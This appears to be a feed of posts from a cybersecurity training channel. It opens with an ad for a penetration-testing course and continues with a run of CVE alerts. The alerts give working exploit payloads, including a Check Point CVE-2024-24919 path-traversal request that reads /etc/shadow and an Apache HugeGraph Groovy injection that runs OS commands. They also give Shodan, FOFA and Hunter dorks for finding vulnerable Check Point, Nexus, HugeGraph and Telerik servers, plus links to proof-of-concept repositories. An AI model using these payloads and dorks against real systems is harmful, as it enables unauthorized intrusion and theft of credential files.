🚀 Advance Your Career in Cybersecurity with Our Comprehensive VAPT Course! 🚀

🚨Are you ready to become a cybersecurity expert? Enroll in our Vulnerability Assessment and Penetration Testing (VAPT) course and gain the skills you need to protect critical systems and data.

📢Key Features:

🔸Live Trainer-Led Online Training: Engage in interactive sessions led by experienced cybersecurity professionals.

🔸50 Hours of Classes Over 3 Months: Comprehensive coverage of VAPT topics, allowing for in-depth learning and mastery.

🔸70% Practical Oriented: Emphasis on hands-on labs and real-world scenarios to ensure you can apply what you learn.

🔸Pay in 2 Installments: Flexible payment options to suit your financial needs.

🔸Career Oriented Training: Focused on building the skills needed for a successful career in cybersecurity.

🔸2 Practical Assignments & 1 Capture The Flag (CTF) Exam: Practical assessments to test and enhance your skills.

👉 Register Now: https://wa.me/message/NQLPOBIAEFDBN1

🚨CVE-2024-24919🚨

💥Shodan Dork: noscript:"Check Point" ssl:"target"

🤠POC:

POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

🚨Go Dork – The Fastest Dork Scanner🚨

👉Searching for relevant things on the Internet is always challenging work. Sometimes we don’t get desired results for our query or question. So to solve this problem, there is a concept of Dorking.

🔗Github: https://github.com/dwisiswant0/go-dork

🚨Check Point Quantum Gateway - CVE-2024-24919🚨

👉CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.

🔗Github POC: https://github.com/seed1337/CVE-2024-24919-POC

🚨Adobe Coldfusion XSS - CVE-2023-44352🚨

👉Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
.
.
.
🔗poc: https://buff.ly/3V2F8tD

"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"

🚨CVE-2024-4956:Nexus Repository Flaw Exposed🚨

⚠️This vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.

👉Dorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"

POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956

CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.

💥POC: https://lnkd.in/g_v4h7Cg

👉Dorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.noscript:"HugeGraph"

📢Use This Extensions, it will help you to Extract all domains From any website.

🔸Link Extractor: https://link-extractor.cssnr.com
🔸Link Gopher: https://github.com/az0/linkgopher

🚨CVE-2024-27348: RCE in Apache HugeGraph-Server.

📢Remedy: Upgrade to version 1.3.0 to mitigate.

😉Payload:

{"gremlin":"def result = \"uname -a\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(\"BrutSecurity\"+ result);"
}

👌Video: https://youtu.be/32cyeCd4DEc

🚨Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800)🚨

📢PoC: https://github.com/sinsinology/CVE-2024-4358

⚠Detailed Analysis from @SinSinology https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/

👉Dorks:
🔸Hunter: /product.name="Telerik report server"
🔸FOFA: app="Telerik-Report-Server"
🔸SHODAN: http.noscript:"Telerik report server"